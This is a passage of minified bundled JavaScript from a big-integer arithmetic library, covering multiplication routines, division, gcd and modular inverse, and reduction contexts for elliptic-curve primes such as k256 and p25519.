Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 0!==f&&(this.words[A]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function M(z){for(var l=new Array(z.bitLength()),f=0;f<l.length;f++){var v=f%26;l[f]=(z.words[f/26|0]&1<<v)>>>v}return l}(l);if(0===f.length)return new I(1);for(var A=this,v=0;v<f.length&&0===f[v];v++,A=A.sqr());if(++v<f.length)for(var P=A.sqr();v<f.length;v++,P=P.sqr())0!==f[v]&&(A=A.mul(P));return A},I.prototype.iushln=function(l){$("number"==typeof l&&l>=0);var P,f=l%26,A=(l-f)/26,v=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P<this.length;P++){var X=this.words[P]&v;this.words[P]=(0|this.words[P])-X<<f|G,G=X>>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==A){for(P=this.length-1;P>=0;P--)this.words[P+A]=this.words[P];for(P=0;P<A;P++)this.words[P]=0;this.length+=A}return this.strip()},I.prototype.ishln=function(l){return $(0===this.negative),this.iushln(l)},I.prototype.iushrn=function(l,f,A){var v;$("number"==typeof l&&l>=0),v=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<<P,L=A;if(v-=G,v=Math.max(0,v),L){for(var h=0;h<G;h++)L.words[h]=this.words[h];L.length=G}if(0!==G)if(this.length>G)for(this.length-=G,h=0;h<this.length;h++)this.words[h]=this.words[h+G];else this.words[0]=0,this.length=1;var R=0;for(h=this.length-1;h>=0&&(0!==R||h>=v);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,A){return $(0===this.negative),this.iushrn(l,f,A)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return!(this.length<=A||!(this.words[A]&1<<f))},I.prototype.imaskn=function(l){$("number"==typeof l&&l>=0);var f=l%26,A=(l-f)/26;return $(0===this.negative,"imaskn works only with positive numbers"),this.length<=A?this:(0!==f&&A++,this.length=Math.min(A,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<<f),this.strip())},I.prototype.maskn=function(l){return this.clone().imaskn(l)},I.prototype.iaddn=function(l){return $("number"==typeof l),$(l<67108864),l<0?this.isubn(-l):0!==this.negative?1===this.length&&(0|this.words[0])<l?(this.words[0]=l-(0|this.words[0]),this.negative=0,this):(this.negative=0,this.isubn(l),this.negative=1,this):this._iaddn(l)},I.prototype._iaddn=function(l){this.words[0]+=l;for(var f=0;f<this.length&&this.words[f]>=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if($("number"==typeof l),$(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f<this.length&&this.words[f]<0;f++)this.words[f]+=67108864,this.words[f+1]-=1;return this.strip()},I.prototype.addn=function(l){return this.clone().iaddn(l)},I.prototype.subn=function(l){return this.clone().isubn(l)},I.prototype.iabs=function(){return this.negative=0,this},I.prototype.abs=function(){return this.clone().iabs()},I.prototype._ishlnsubmul=function(l,f,A){var P;this._expand(l.length+A);var G,X=0;for(P=0;P<l.length;P++){G=(0|this.words[P+A])+X;var L=(0|l.words[P])*f;X=((G-=67108863&L)>>26)-(L/67108864|0),this.words[P+A]=67108863&G}for(;P<this.length-A;P++)X=(G=(0|this.words[P+A])+X)>>26,this.words[P+A]=67108863&G;if(0===X)return this.strip();for($(-1===X),X=0,P=0;P<this.length;P++)X=(G=-(0|this.words[P])+X)>>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var A,v=this.clone(),P=l,G=0|P.words[P.length-1];0!=(A=26-this._countBits(G))&&(P=P.ushln(A),v.iushln(A),G=0|P.words[P.length-1]);var h,L=v.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R<h.length;R++)h.words[R]=0}var J=v.clone()._ishlnsubmul(P,1,L);0===J.negative&&(v=J,h&&(h.words[L]=1));for(var Z=L-1;Z>=0;Z--){var ue=67108864*(0|v.words[P.length+Z])+(0|v.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),v._ishlnsubmul(P,ue,Z);0!==v.negative;)ue--,v.negative=0,v._ishlnsubmul(P,1,Z),v.isZero()||(v.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),v.strip(),"div"!==f&&0!==A&&v.iushrn(A),{div:h||null,mod:v}},I.prototype.divmod=function(l,f,A){return $(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(v=G.div.neg()),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.iadd(l)),{div:v,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(v=G.div.neg()),{div:v,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),A&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var v,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var A=0!==f.div.negative?f.mod.isub(l):f.mod,v=l.ushrn(1),P=l.andln(1),G=A.cmp(v);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red 